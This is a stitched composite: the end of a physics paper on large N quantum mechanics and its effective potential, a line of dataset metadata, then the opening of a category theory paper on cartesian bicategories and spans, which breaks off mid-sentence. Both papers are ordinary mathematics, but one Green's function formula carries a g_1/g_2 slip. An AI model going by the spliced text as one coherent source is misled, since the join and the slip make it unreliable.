function $G(x,y)$. The field $\rho$ is equal to this function at
coincident points. In QFT this is divergent and is to be
regularized. We will concentrate on the case of $d=1$ where no
regularization is needed.
The main difficulty in solving equations (\ref{General_equations})
stems from the fact that $G(x,y)$ is a Green's function of the
operator which involves an unknown function $\lambda(x)$. In
\cite{Asnin:2009bs} there was found a particular exact solution of
these equations for $d=3$ and a potential
$U(\rho)=\frac{g_6}{6}\,\rho^3$, which corresponds to a model
$\vec{\phi}^6$. The particular solution found there corresponds to a
vanishing energy. In that case there is no scale in the problem
since the coupling constant $g_6$ is dimensionless in $d=3$.
Therefore the form of the solution is determined by dimensional
analysis up to dimensionless multiplicative constants which can be
fixed.\footnote{In \cite{Asnin:2009bs} there were also considered
approximate solutions of equations (\ref{General_equations})} In
this paper we solve the equations (\ref{General_equations}) in the
case of $d=1$.
\section{Classical analysis}\label{Classical_analysis}
In this section we consider a classical version of the large $N$
quantum mechanics. Our main purpose is to write the EOM in a form
that will be convenient for a comparison with its quantum
counterpart. For the same reason we work in the Euclidean signature.
We denote the Euclidean time by $\tau$.
The Euclidean Lagrangian of the system is \begin{equation}
L=\frac12\left(\partial_{\tau}\vec{\phi}\right)^2+NU\left(\frac{\vec{\phi}^2}{N}\right)\,
.\end{equation} We consider a phase with an unbroken global $O(N)$ symmetry,
which means that the field configurations we are interested in are
of the form \begin{equation} \vec{\phi}(\tau)=\phi(\tau)\,\bigl(1,1,\ldots
1\bigr)\, ,\end{equation} where the vector on the RHS has $N$ components. For
such field configurations the Lagrangian can be rewritten as \begin{equation}
L=N\,\Bigl(\frac12\dot{\phi}^2+U(\phi^2)\Bigr)\,,\end{equation} where a dot is
a derivative w.r.t. $\tau$. The Euclidean EOM is \begin{equation}
\ddot{\phi}=\frac{dU}{d\phi}\,.\end{equation}
In order to make this equation resemble the quantum one we introduce
a classical analog of the field $\rho$:\begin{equation}
\rho_{cl}=\frac{\vec{\phi}^2}{N}=\phi^2\,.\end{equation} Then, using the fact that
$\frac{dU}{d\phi}=2\phi\frac{dU}{d\rho}$ one can write a
differential equation of the third order for $\rho_{cl}$:\begin{equation}
\dddot{\rho}_{cl}=8U'(\rho_{cl})\,\dot{\rho}_{cl}+4U''(\rho_{cl})\,\rho_{cl}\,\dot{\rho}_{cl}\,.\label{Classical_eq}\end{equation}
This equation should be supplemented by initial conditions. Suppose
that at $\tau=0$ the field $\phi$ is equal to $\phi_0$ and its time
derivative is $\dot{\phi}_0$. Then the initial conditions for eq.
(\ref{Classical_eq}) are \begin{equation} \rho_{cl}(0)=\phi_0^2,\qquad
\dot{\rho_{cl}}(0)=2\,\phi_0\,\dot{\phi}_0,\qquad
\ddot{\rho_{cl}}(0)=U'\left(\phi_0^2\right)+2\,\dot{\phi}_0^2\,.\end{equation} This
is the EOM in the form of (\ref{Classical_eq}) that will be compared
to the quantum one in the next section.
\section{Quantum solution}\label{Quantum_case}
In this section we derive the quantum EOM for the field $\rho$
starting from general equations (\ref{General_equations}). The main
result is that the quantum EOM is again of the form
(\ref{Classical_eq}), but the initial conditions are different. It
will also be shown that a difference in the initial conditions can
be turned into a correction to a potential.
In the case of quantum mechanics eqs. (\ref{General_equations})
reduce to \begin{equation} 2U'\bigl(\rho(\tau)\bigr)=i\lambda(\tau),\qquad
\rho(x)=G(\tau,\tau),\qquad
\Bigl(-\pd_{\tau}^2+i\lambda(\tau)\Bigr)\,G(\tau,\tau_0)=\delta(\tau-\tau_0)\,\label{General_equations_1d}\,,\end{equation}
and there is no need in a regularization.
We are going to consider a rolling of the system from a top of the
potential. Therefore we assume that the fields $\rho$ and $\lambda$
possess limits when $\tau\to\infty$. We will denote the limit of
$i\lambda$ by $m^2$ and assume in what follows that its value is
positive. Then we redefine the field $\lambda$:\begin{equation} i\lambda=i\lambda_1+m^2\,
,\end{equation} so that the new field $\lambda_1$ goes to 0 at infinity. In terms
of this new field the eqs. (\ref{General_equations_1d})
become \begin{eqnarray} 2U'\bigl(\rho(\tau)\bigr)&=&i\lambda_1(\tau)+m^2\label{Rho_eq},\\
\rho(x)&=&G_m(\tau,\tau),\\
\Bigl(-\pd_{\tau}^2+i\lambda(\tau)+m^2\Bigr)\,G_m(\tau,\tau_0)&=&\delta(\tau-\tau_0)\,\label{General_equations_m}\,,\end{eqnarray}
where the subscript of $G$ indicates the value of the parameter $m$
at which the Green's function is computed.
In one dimension the Green's function is closely related to
solutions of the corresponding homogeneous equation \begin{equation}
\Bigl(-\pd_{\tau}^2+i\lambda_1(\tau)+m^2\Bigr)\,g(\tau)=0\,.\label{Homogeneous_eq}\end{equation}
Since $\lambda_1$ vanishes at infinity the solutions of this equation
look at infinity as $e^{\pm m\tau}$ (this approach is similar to
that used in \cite{Feinberg:1994qq}). We choose two linear
independent solutions $g_{1,2}$ of the homogeneous equation so that
the function $g_1(\tau)$ goes to 0 as $\tau\to-\infty$ and
$g_2(\tau)$ goes to 0 as $\tau\to+\infty$. We will fix their
normalization later.
In terms of these solutions the Green's function can be written as
\begin{equation} G_m(\tau, \tau_0)=\Biggl\{\begin{array}{c}
\alpha_1\,g_1(\tau),\qquad \tau<\tau_0 \\
\alpha_2\,g_2(\tau),\qquad \tau>\tau_0
\end{array}\end{equation}
where the coefficients $\alpha_{1,2}$ satisfy \begin{equation}
\alpha_1\,g_1(\tau_0)=\alpha_2\,g_2(\tau_0),\qquad
\alpha_1\,g'_1(\tau_0)-\alpha_2\,g'_2(\tau_0)=1\,.\end{equation} Solving these
equations leads to the following expression for the Green's
function: \begin{equation} G_m(\tau,
\tau_0)=\frac{1}{W(g_1,g_2)}\,\Biggl\{\begin{array}{c}
g_1(\tau)\,g_2(\tau_0),\qquad \tau<\tau_0 \\
g_1(\tau_0)\,g_1(\tau),\qquad \tau>\tau_0
\end{array}\end{equation}
where $W(g_1,g_2)\equiv g'_1(\tau)g_2(\tau)-g'_2(\tau)g_1(\tau)$ is
a Wronskian of the two solutions. It is independent of $\tau$ and we
fix the normalization of the basic solutions $g_{1,2}(\tau)$ so that
$W(g_1,g_2)=1$. With this normalization \begin{equation} G_m(\tau,
\tau_0)=\Biggl\{\begin{array}{c}
g_1(\tau)\,g_2(\tau_0),\qquad \tau<\tau_0 \\
g_1(\tau_0)\,g_1(\tau),\qquad \tau>\tau_0
\end{array}\end{equation}
and the Green's function with coincident points (which is equal to
$\rho$) is \begin{equation}
G_m(\tau,\tau)\equiv\rho(\tau)=g_1(\tau)g_2(\tau)\,.\end{equation} Using eq.
(\ref{Homogeneous_eq}) we write the equation for $\rho$:\begin{equation}
\dddot{\rho}=4\bigl(i\lambda_1+m^2\bigr)\,\dot{\rho}+2\,i\dot{\lambda}\,\rho\,.\end{equation}
Now, using (\ref{Rho_eq}) we get \begin{equation}
\dddot{\rho}=8U'(\rho)\,\dot{\rho}+4U''(\rho)\,\rho\dot{\rho}\,.\label{Quantum_eq}\end{equation}
This equation precisely coincides with the classical equation
(\ref{Classical_eq}). However, this does not mean that the possible
motions of the system are the same, since we need to specify initial
conditions. Eqs. (\ref{Classical_eq}, \ref{Quantum_eq}) are of the
third order and should be integrated once to be brought to a usual
form of equations of dynamics.
In order to integrate once the eq. (\ref{Quantum_eq}) define a new
field in analogy with the classical case:\begin{equation} \Phi=\sqrt{\rho}\,.\end{equation}
In terms of this new field a first integral of eq.
(\ref{Quantum_eq}) can be written as \begin{equation}
\ddot{\Phi}=\frac{dU}{d\Phi}+\frac{\alpha}{\Phi^3}\,.\label{Quantum_Phi_eq}\end{equation}
Here $\alpha$ is an integration constant. In order to fix it
consider constant solutions of (\ref{Quantum_Phi_eq}). They are
given by extrema of the function \begin{equation}
\bar{U}(\Phi^2)=U(\Phi^2)-\frac{\alpha}{2\Phi^2}\,,\end{equation} or if we
rewrite it in terms of $\rho$, by extrema of \begin{equation}
\bar{U}(\rho)=U(\rho)-\frac{\alpha}{2\rho}\,.\end{equation} We see that the
function $\bar{U}$ is of the form of a general effective potential
of the large $N$ vector model at $d=1$, which is given in
(\ref{1d_eff_potential}). This fixes $\alpha=-1/4$, and the
effective potential becomes \begin{equation}
U_{eff}(\Phi^2)=U(\Phi^2)+\frac{1}{8\Phi^2}\,.\label{Quantum_effective_potential}\end{equation}
The quantum EOM can be written in terms of the field $\Phi$ as \begin{equation}
\ddot{\Phi}=\frac{dU(\Phi^2)}{d\Phi}-\frac{1}{4\Phi^3}\,,\end{equation} or,
Wick rotating back to the Lorentzian time $t$, \begin{equation}
\ddot{\Phi}=-\frac{dU(\Phi^2)}{d\Phi}+\frac{1}{4\Phi^3}\,,\label{Quantum_Phi_eq_fixed_const}\end{equation}
This equation by construction correctly reproduces the extrema on
the quantum effective potential (\ref{1d_eff_potential}). Other
solutions of this equation describe time-dependent processes in the
system.
We have proven that the quantum mechanical EOM for an expectation
value of the field $\Phi$ (or $\rho$) is of a form of the classical
EOM but with a corrected potential. Therefore a classical intuition
about a motion of the system applies directly to the quantum case.
For example, a frequency of small oscillations around a minimum of
the effective potential is given by
$\omega^2=U_{eff}^{\prime\prime}(\Phi_0)$, where $\Phi_0$ is an
expectation value of the field $\sqrt{\rho}$ at the minimum of
$U_{eff}$. One can also draw a phase portrait on the phase plane
which would describe qualitatively all possible motions of the
system. In addition, the quantum mechanical tunneling is not
allowed. This is a consequence of the large $N$ limit. We show this
in a different way in appendix \ref{Tunneling}, where we also show
that the tunneling amplitude goes to zero as
$\pi^{N/2}\left[(N/2)!\right]^{-1}$.
\section{Summary and discussion}\label{Summary}
In this paper we considered the large $N$ quantum mechanics with an
unbroken global $O(N)$ symmetry. We found that the mean value of the
square of the field satisfies a classical EOM with modified
potential (\ref{Quantum_effective_potential}). Since the EOM is
purely classical we conclude that the correction to the potential is
the only difference between the classical action and the 1PI
effective action which governs the quantum evolution. In particular,
there are no terms with time derivatives, contrary to the case of
$d=3$, where such terms are present \cite{Asnin:2009bs}. This result
allows one to compute all characteristics of time-dependent
processes in an arbitrary potential (frequencies of oscillations
around minima of the potential, characteristic times of rolling, the
phase portrait etc) by the conventional means of the classical
mechanics. It also follows that the tunneling in the system is
suppressed in the large $N$ limit.
A desirable continuation of this work is to find a way to solve the
quantum EOM's in the case of higher dimensionality. This is much
more difficult, however. Although a reduction of the problem to a
one-dimensional case is always possible (assuming that the solution
we are looking for depends only on time), an expression for the
field $\rho$ in terms of solutions of a homogeneous eq. similar to
(\ref{Homogeneous_eq}) will in general involve an integral over a
mass, a fact that significantly complicates a computation.
\section*{Acknowledgements}
I thank S. Elitzur, E. Rabinovici and M. Smolkin for discussions and
useful comments.
| 2024-02-18T23:40:05.160Z | 2009-10-15T17:54:15.000Z | algebraic_stack_train_0000 | 1,284 | 3,244 |
|
proofpile-arXiv_065-6488 | \section{Introduction}\label{intro}
Let ${\cal E}$ be a category with finite limits. For the bicategory $\mathrm{Span}\,{\cal E}$,
the locally full subbicategory $\mathrm{Map}\mathrm{Span}\,{\cal E}$ determined by the left adjoint
arrows is essentially locally discrete, meaning that each hom category
$\mathrm{Map}\mathrm{Span}\,{\cal E}(X,A)$ is an equivalence relation, and so is equivalent to a
discrete category. Indeed, a span
$x{\kern -.25em}:{\kern -.25em} X\,{\s\toleft}\, S{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} a$ has a right adjoint if and only if $x{\kern -.25em}:{\kern -.25em} S{\,\s\to}\, X$ is
invertible. The functors
$$\mathrm{Map}\mathrm{Span}\,{\cal E}(X,A)\to{\cal E}(X,A)\quad\mbox{given by}\quad(x,a)\mapsto ax^{-1}$$
provide equivalences of categories which are the effects on homs for a
biequivalence
$$\mathrm{Map}\mathrm{Span}\,{\cal E}{\,\s\to}\,{\cal E}\, .$$
Since ${\cal E}$ has finite products, $\mathrm{Map}\mathrm{Span}\,{\cal E}$ has finite products
{\em as a bicategory}. We refer the reader to \cite{ckww} for a
thorough treatment of bicategories with finite products.
Each hom category $\mathrm{Span}\,{\cal E}(X,A)$ is {\em isomorphic} to the slice
category ${\cal E}/(X\times A)$ which has binary products given by pullback in
${\cal E}$ and terminal object $1{\kern -.25em}:{\kern -.25em} X\times A{\,\s\to}\, X\times A$. Thus $\mathrm{Span}\,{\cal E}$ is a
{\em precartesian bicategory} in the sense of \cite{ckww}. The
canonical lax monoidal structure
$$\mathrm{Span}\,{\cal E}\times \mathrm{Span}\,{\cal E}\to\mathrm{Span}\,{\cal E}\toleft\mathbf{1}$$
for this precartesian bicategory is seen to have its binary aspect
given on arrows by
$$(X\xleftarrow{x} S \xrightarrow{y} A\,,\, Y\xleftarrow{y} T\xrightarrow{b} B )
\mapsto (X\times Y \xleftarrow{x\times y} S\times T \xrightarrow{a\times b} A\times B)\, ,$$
and its nullary aspect provided by
$$1\xleftarrow1 1 \xrightarrow1 1\, ,$$
the terminal object of $\mathrm{Span}\,{\cal E}(1,1)$. Both of these lax functors are
readily seen to be pseudofunctors so that $\mathrm{Span}\,{\cal E}$ is a {\em cartesian
bicategory} as in \cite{ckww}.
The purpose of this paper is to characterize those cartesian bicategories
$\mathbf{B}$ which are biequivalent to $\mathrm{Span}\,{\cal E}$, for some category ${\cal E}$ with
finite limits. Certain aspects of a solution to the problem are immediate.
A biequivalence $\mathbf{B}\sim\mathrm{Span}\,{\cal E}$ provides $$\mathrm{Map}\mathbf{B}\sim\mathrm{Map}\mathrm{Span}\,{\cal E}\sim{\cal E}$$
so that we must ensure firstly that $\mathrm{Map}\mathbf{B}$ is essentially locally discrete.
From the characterization of bicategories of relations as locally ordered
cartesian bicategories in \cite{caw} one suspects that the following axiom
will figure prominently in providing essential local discreteness for
$\mathrm{Map}\mathbf{B}$.
\axm\label{frob}{\em Frobenius:}\quad A cartesian bicategory $\mathbf{B}$
is said to satisfy the {\em Frobenius} axiom if, for each $A$ in $\mathbf{B}$,
$A$ is Frobenius.
\eth
\noindent
Indeed Frobenius objects in cartesian bicategories were defined
and studied in \cite{ww} where amongst other things it is shown that if $A$
is Frobenius in cartesian $\mathbf{B}$ then, for all $X$, $\mathrm{Map}\mathbf{B}(X,A)$ is a
groupoid. (This theorem was generalized considerably in \cite{lsw} which
explained further aspects of the Frobenius concept.) However, essential local
discreteness for $\mathrm{Map}\mathbf{B}$ requires also that the $\mathrm{Map}\mathbf{B}(X,A)$ be
ordered sets (which is automatic for locally ordered $\mathbf{B}$). Here we
study also {\em separable} objects in cartesian bicategories for which we
are able to show that if $A$ is separable in cartesian $\mathbf{B}$ then,
for all $X$, $\mathrm{Map}\mathbf{B}(X,A)$ is an ordered set and a candidate axiom is:
\axm\label{sepax}{\em Separable:}\quad A cartesian bicategory $\mathbf{B}$
is said to satisfy the {\em Separable} axiom if, for each $A$ in $\mathbf{B}$,
$A$ is separable.
\eth
In addition to essential local discreteness, it is clear that we will
need an axiom which provides {\em tabulation} of each arrow of $\mathbf{B}$
by a span of maps. Since existence of Eilenberg-Moore objects is a
basic 2-dimensional limit concept, we will express tabulation in terms of
this requirement; we note that existence of pullbacks in $\mathrm{Map}\mathbf{B}$
follows easily from tabulation. In the bicategory $\mathrm{Span}\,{\cal E}$, the comonads
$G{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$ are precisely the symmetric spans $g{\kern -.25em}:{\kern -.25em} A\,{\s\toleft}\, X{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} g$;
the map $g{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ together with $g\eta_g{\kern -.25em}:{\kern -.25em} g{\,\s\to}\, gg^*g$ provides an
Eilenberg-Moore coalgebra for $g{\kern -.25em}:{\kern -.25em} A\,{\s\toleft}\, X{\,\s\to}\, A{\kern -.25em}:{\kern -.25em} g$.
We will posit:
\axm\label{emc}{\em Eilenberg-Moore for Comonads:}\quad Each comonad
$(A,G)$ in $\mathbf{B}$ has an Eilenberg-Moore object.
\eth
Conversely, any map (left adjoint) $g{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ in $\mathrm{Span}\,{\cal E}$ provides
an Eilenberg-Moore object for the comonad $gg^*$.
\noindent
We further posit:
\axm\label{mc}{\em Maps are Comonadic:}\quad Each left adjoint $g{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$
in $\mathbf{B}$ is comonadic.
\eth
\noindent
from which, in our context, we can also deduce the Frobenius and
Separable axioms.
In fact we shall also give, in Proposition~\ref{easy} below, a straightforward proof
that $\mathrm{Map}\mathbf{B}$ is locally essentially discrete whenever Axiom~\ref{mc} holds.
But due to the importance of the Frobenius and separability conditions in other
contexts, we have chosen to analyze them in their own right.
\section{Preliminaries}\label{prelim}
We recall from \cite{ckww} that a bicategory $\mathbf{B}$ (always, for
convenience, assumed to be normal) is said to be
{\em cartesian} if the subbicategory of maps (by which we mean
left adjoint arrows), $\mathbf{M}=\mathrm{Map}\mathbf{B}$, has finite products $-\times-$
and $1$; each hom-category $\mathbf{B}(B,C)$ has finite products $-\wedge-$
and $\top$; and a certain derived tensor product $-\otimes-$ and $I$
on $\mathbf{B}$, extending the product structure of $\mathbf{M}$, is functorial.
As in \cite{ckww},
we write $p$ and $r$ for the first and second projections at the global level,
and similarly $\pi$ and $\rho$ for the projections at the local level.
If $f$ is a map of $\mathbf{B}$ --- an arrow of $\mathbf{M}$ --- we will write
$\eta_f,\epsilon_f{\kern -.25em}:{\kern -.25em} f\dashv f^*$ for a chosen adjunction in $\mathbf{B}$
that makes it so. It was shown that the derived tensor product of a
cartesian bicategory underlies a symmetric monoidal bicategory
structure. We recall too that in \cite{ww} Frobenius objects in a
general cartesian bicategory were defined and studied. We will need
the central results of that paper too. Throughout this paper, $\mathbf{B}$
is assumed to be a cartesian bicategory.
As in \cite{ckww} we write
$$\bfig
\Atriangle/->`->`/[\mathbf{G}={\rm Gro}\mathbf{B}`\mathbf{M}`\mathbf{M};\partial_0`\partial_1`]
\efig$$
for the Grothendieck span corresponding to
$$\mathbf{M}{^\mathrm{op}}\times\mathbf{M}\to^{i{^\mathrm{op}}\times i}\mathbf{B}{^\mathrm{op}}\times\mathbf{B}\to^{\mathbf{B}(-,-)}\mathbf{CAT}$$
where $i{\kern -.25em}:{\kern -.25em}\mathbf{M}{\,\s\to}\,\mathbf{B}$ is the inclusion. A typical arrow of $\mathbf{G}$,
$(f,\alpha,u){\kern -.25em}:{\kern -.25em}(X,R,A){\,\s\to}\,(Y,S,B)$ can be depicted by a square
\begin{equation}\label{square}
\bfig
\square(0,0)[X`Y`A`B;f`R`S`u]
\morphism(125,250)|m|<250,0>[`;\alpha]
\efig
\end{equation}
and such arrows are composed by pasting. A 2-cell
$(\phi,\psi){\kern -.25em}:{\kern -.25em}(f,\alpha,u){\,\s\to}\,(g,\beta,v)$ in $\mathbf{G}$ is a pair of
2-cells $\phi{\kern -.25em}:{\kern -.25em} f{\,\s\to}\, g$, $\psi{\kern -.25em}:{\kern -.25em} u{\,\s\to}\, v$ in $\mathbf{M}$ which satisfy
the obvious equation. The (strict) pseudofunctors $\partial_0$
and $\partial_1$ should be regarded as {\em domain} and {\em codomain}
respectively. Thus, applied to (\ref{square}), $\partial_0$ gives $f$
and $\partial_1$ gives $u$. The bicategory $\mathbf{G}$ also has finite products,
which are given on objects by $-\otimes-$ and $I$; these are preserved by
$\partial_0$ and $\partial_1$.
The Grothendieck span can also be thought of as giving a double category
(of a suitably weak flavour), although we shall not emphasize that point of view.
\subsection{}\label{xredux}
The arrows of $\mathbf{G}$ are particularly well suited to relating the
various product structures in a cartesian bicategory. In 3.31 of
\cite{ckww} it was shown that the local binary product, for
$R,S{\kern -.25em}:{\kern -.25em} X{\scalefactor{0.5} \two}A$, can be recovered to within isomorphism from
the defined tensor product by
$$R\wedge S\cong d^*_A(R\otimes S)d_X$$
A slightly more precise version of this is that
the mate of the isomorphism above, with respect to the single
adjunction $d_A\dashv d^*_A$, defines an arrow in $\mathbf{G}$
$$\bfig
\square(0,0)[X`X\otimes X`A`A\otimes A;d_X`R\wedge S`R\otimes S`d_A]
\morphism(125,250)|m|<250,0>[`;]
\efig$$
which when composed with the projections of $\mathbf{G}$, recovers the
local projections as in
$$
\bfig
\square(0,0)|almb|[X`X\otimes X`A`A\otimes A;d_X`R\wedge S`R\otimes S`d_A]
\morphism(125,250)|m|<250,0>[`;]
\square(500,0)|amrb|[X\otimes X`X`A\otimes A`A;p_{X,X}`R\otimes S`R`p_{A,A}]
\morphism(625,250)|m|<250,0>[`;\tilde p_{R,S}]
\place(1250,250)[\cong]
\square(1550,0)|almb|[X`X`A`A;1_X`R\wedge S`R`1_A]
\morphism(1675,250)|m|<250,0>[`;\pi]
\efig$$
for the first projection, and similarly for the second.
The unspecified $\cong$ in $\mathbf{G}$ is given by a pair of
convenient isomorphisms $p_{X,X}d_X\cong 1_X$ and $p_{A,A}d_A\cong 1_A$
in $\mathbf{M}$. Similarly, when $R\wedge S{\,\s\to}\, R\otimes S$ is composed
with $(r_{X,X},\tilde r_{R,S},r_{A,A})$ the result is
$(1_X,\rho,1_A){\kern -.25em}:{\kern -.25em} R\wedge S{\,\s\to}\, S$.
\subsection{}\label{bc}
Quite generally, an arrow of $\mathbf{G}$ as given by the square (\ref{square})
will be called a {\em commutative} square if $\alpha$ is invertible.
An arrow of $\mathbf{G}$ will be said to satisfy the
{\em Beck condition} if the mate
of $\alpha$ under the adjunctions $f\dashv f^*$ and $u\dashv u^*$, as given
in the square below (no longer an arrow of $\mathbf{G}$), is invertible.
$$\bfig
\square(1000,0)/<-`->`->`<-/[X`Y`A`B;f^*`R`S`u^*]
\morphism(1125,250)|m|<250,0>[`;\alpha^*]
\efig$$
Thus Proposition 4.7 of \cite{ckww} says that projection squares of the
form $\tilde p_{R,1_Y}$ and $\tilde r_{1_X,S}$ are commutative while
Proposition 4.8 of \cite{ckww} says that these same squares satisfy
the Beck condition.
If $R$ and $S$ are also maps and $\alpha$ is invertible then
$\alpha^{-1}$ gives rise to another arrow of $\mathbf{G}$, from $f$ to $u$
with reference to the square above, which may or may
not satisfy the Beck condition. The point here is that a
commutative square of maps gives rise to two, generally distinct,
Beck conditions. It is well known that, for bicategories
of the form $\mathrm{Span}\,{\cal E}$ and $\mathrm{Rel}\,{\cal E}$, all pullback
squares of maps satisfy both Beck conditions. A category
with finite products has automatically a number of pullbacks which
we might call {\em product-absolute} pullbacks because they are
preserved by all functors which preserve products. In \cite{ww}
the Beck conditions for the product-absolute pullback squares of the form
$$\bfig
\Square(1000,0)/->`<-`<-`->/[A\times A`A\times A\times A`A`A\times A;d\times A`d`A\times d`d]
\efig$$
were investigated.
(In fact, in this case it was shown that either Beck condition
implies the other.) The objects for which these conditions
are met are called {\em Frobenius} objects.
\prp\label{mcifro} For a cartesian bicategory, the axiom {\em Maps are Comonadic}
implies the axiom {\em Frobenius}.
\eth
\prf It suffices to show that the 2-cell $\delta_1$ below is invertible:
$$\bfig
\square(0,0)|alrb|/<-`->``<-/<750,500>%
[A`A\otimes A`A\otimes A`A\otimes(A\otimes A);d^*`d``1\otimes d^*]
\morphism(750,500)|r|<0,-250>[A\otimes A`(A\otimes A)\otimes A;d\otimes 1]
\morphism(750,250)|r|<0,-250>[(A\otimes A)\otimes A`A\otimes(A\otimes A);a]
\morphism(175,250)|a|<150,0>[`;\delta_1]
\square(0,-500)|blrb|/<-`->`->`<-/<750,500>%
[A\otimes A`A\otimes(A\otimes A)`A`A\otimes A;1\otimes d^*`r`r`d^*]
\morphism(250,-250)|a|<150,0>[`;\tilde r_{1_A,d^*}]
\efig$$
The paste composite of the squares is invertible (being
essentially the identity 2-cell on $d^*$). The lower 2-cell is invertible
by Proposition 4.7 of \cite{ckww} so that the whisker composite
$r\delta_1$ is invertible. Since $r$ is a map it reflects isomorphisms, by
Maps are Comonadic, and hence $\delta_1$ is invertible.
\frp
\rmk\label{frobclofin} It was shown in \cite{ww} that, in a cartesian
bicategory, the Frobenius objects are closed under finite products.
It follows that the full subbicategory of a cartesian bicategory
determined by the Frobenius objects is a cartesian bicategory
which satisfies the Frobenius axiom.
\eth
\section{Separable Objects and Discrete Objects
in Cartesian Bicategories}\label{Sep}
In this section we look at separability for objects of cartesian bicategories.
Since for an object $A$ which is both separable and Frobenius, the hom-category
$\mathrm{Map}\mathbf{B}(X,A)$ is essentially discrete, for all $X$, we shall then be able to
show that $\mathrm{Map}\mathbf{B}$ is essentially discrete by showing that all objects in $\mathbf{B}$
are separable and Frobenius. But first we record the following direct argument:
\begin{proposition}\label{easy}
If $\mathbf{B}$ is a bicategory in which all maps are comonadic and $\mathrm{Map}\mathbf{B}$ has
a terminal object, then $\mathrm{Map}\mathbf{B}$ is locally essentially discrete.
\end{proposition}
\prf
We must show that for all objects $X$ and $A$, the hom-category $\mathrm{Map}\mathbf{B}(X,A)$
is essentially discrete. As usual, we write $1$ for the terminal object of $\mathrm{Map}\mathbf{B}$
and $t_A:A\to 1$ for the essentially unique map, which by assumption is
comonadic. Let $f,g:X\to A$ be maps from $X$ to $A$. If $\alpha:f\to g$ is any
2-cell, then $t_A\alpha$ is invertible, since $1$ is terminal in $\mathrm{Map}\mathbf{B}$. But
since $t_A$ is comonadic, it reflects isomorphisms, and so $\alpha$ is invertible.
Furthermore, if $\beta:f\to g$ is another 2-cell, then $t_A\alpha=t_A\beta$ by
the universal property of $1$ once again, and now $\alpha=\beta$ since $t_A$
is faithful. Thus there is at most one 2-cell from $f$ to $g$, and any such 2-cell
is invertible.
\frp
In any (bi)category with finite products the diagonal
arrows $d_A{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A\times A$ are (split) monomorphisms so that
in the bicategory $\mathbf{M}$ the following square is a product-absolute
pullback
$$\bfig
\square(0,0)[A`A`A`A\otimes A;1_A`1_A`d_A`d_A]
\efig$$
that gives rise to a single $\mathbf{G}$ arrow.
\dfn\label{sep}
An object $A$ in a cartesian bicategory is said to be
{\em separable} if the $\mathbf{G}$ arrow above satisfies the Beck
condition.
\eth
Of course the invertible mate condition here says precisely that the
unit $\eta_{d_A}\f1_A{\,\s\to}\, d_A^*d_A$ for the adjunction
$d_A\dashv d_A^*$ is invertible. Thus Axiom \ref{sepax}, as stated in
the Introduction, says that, for all $A$ in $\mathbf{B}$, $\eta_{d_A}$ is
invertible.
\rmk\label{sepcat} For a map $f$ it makes sense to define
{\em $f$ is fully faithful} to mean that $\eta_f$ is invertible. For
a {\em category $A$} the diagonal $d_A$ is fully faithful if and only
if $A$ is an ordered set.
\eth
\prp\label{sepmeans}
For an object $A$ in a cartesian bicategory,
the following are equivalent:
\begin{enumerate}[$i)$]
\item $A$ is separable;
\item for all $f{\kern -.25em}:{\kern -.25em} X{\,\s\to}\, A$ in $\mathbf{M}$, the diagram $f\,{\s\toleft}\, f{\,\s\to}\, f$ is a product in
$\mathbf{B}(X,A)$;
\item $1_A\,{\s\toleft}\, 1_A{\,\s\to}\, 1_A$ is a product in $\mathbf{B}(A,A)$;
\item $1_A{\,\s\to}\,\top_{A,A}$ is a monomorphism in $\mathbf{B}(A,A)$;
\item for all $G\ra1_A$ in $\mathbf{B}(A,A)$, the diagram $G\,{\s\toleft}\, G\ra1_A$ is
a product in $\mathbf{B}(A,A)$.
\end{enumerate}
\eth
\prf
$[i)\Longrightarrow$ $ii)]$ A local product of maps is not generally a
map but here we have:
$$f\wedge f\cong d_A^*(f\otimes f)d_X\cong d_A^*(f\times f)d_X\cong%
d_A^*d_A f\cong f$$
$[ii)\Longrightarrow$ $iii)]$ is trivial.
$[iii)\Longrightarrow$ $i)]$ Note the use of
pseudo-functoriality of $\otimes$:
$$d^*_Ad_A\cong d^*_A1_{A\otimes A}d_A\cong d^*_A(1_A\ox1_A)d_A%
\iso1_A\wedge1_A\iso1_A$$
$[iii)\Longrightarrow$ $iv)]$ To say that $1_A\,{\s\toleft}\, 1_A{\,\s\to}\, 1_A$ is a
product in $\mathbf{B}(A,A)$ is precisely to say that
$$\bfig
\square(0,0)[1_A`1_A`1_A`\top_{A,A};1_{1_A}`1_{1_A}``]
\efig$$
is a pullback in $\mathbf{B}(A,A)$ which in turn is precisely to say that
$1_A{\,\s\to}\,\top_{A,A}$ is a monomorphism in $\mathbf{B}(A,A)$
$[iv)\Longrightarrow$ $v)]$ It is a generality that if an object
$S$ in a category is subterminal then for any $G{\,\s\to}\, S$, necessarily
unique, $G\,{\s\toleft}\, G{\,\s\to}\, S$ is a product diagram.
$[v)\Longrightarrow$ $iii)]$ is trivial.
\frp
\cor\label{mcisep}{\rm [Of $iv)$]} For a cartesian bicategory, the axiom {\em Maps are
Comonadic} implies the axiom {\em Separable}.
\eth
\prf
We have $\top_{A,A}=t_A^*t_A$ for the map $t_A{\kern -.25em}:{\kern -.25em} A\ra1$. It follows
that the unique $1_A{\,\s\to}\, t_A^*t_A$ is $\eta_{t_A}$. Since $t_A$ is
comonadic, $\eta_{t_A}$ is the equalizer shown:
$$1_A\to^{\eta_{t_A}}t_A^*t_A\two%
^{t_A^*t_A\eta_{t_A}}_{\eta_{t_A}t_A^*t_A}t_A^*t_At_A^*t_A$$
and hence a monomorphism.
\frp
\cor\label{copt}{\rm [Of $iv)$]} For separable $A$ in cartesian $\mathbf{B}$, an
arrow $G{\kern -.25em}:{\kern -.25em} A{\,\s\to}\, A$ admits at most one copoint $G{\,\s\to}\, 1_A$ depending upon
whether the unique arrow $G{\,\s\to}\,\top_{A,A}$ factors through
$1_A{\scalefactor{0.75}\mon}\top_{A,A}$.
\frp
\eth
\prp\label{sepclofin} In a cartesian bicategory,
the separable objects are closed under finite products.
\eth
\prf
If $A$ and $B$ are separable objects then applying
the homomorphism
$\otimes{\kern -.25em}:{\kern -.25em}\mathbf{B}\times\mathbf{B}{\,\s\to}\,\mathbf{B}$
we have an adjunction $d_A\times d_B\dashv d_A^*\otimes d_B^*$ with
unit $\eta_{d_A}\otimes\eta_{d_B}$ which being an isomorph of the
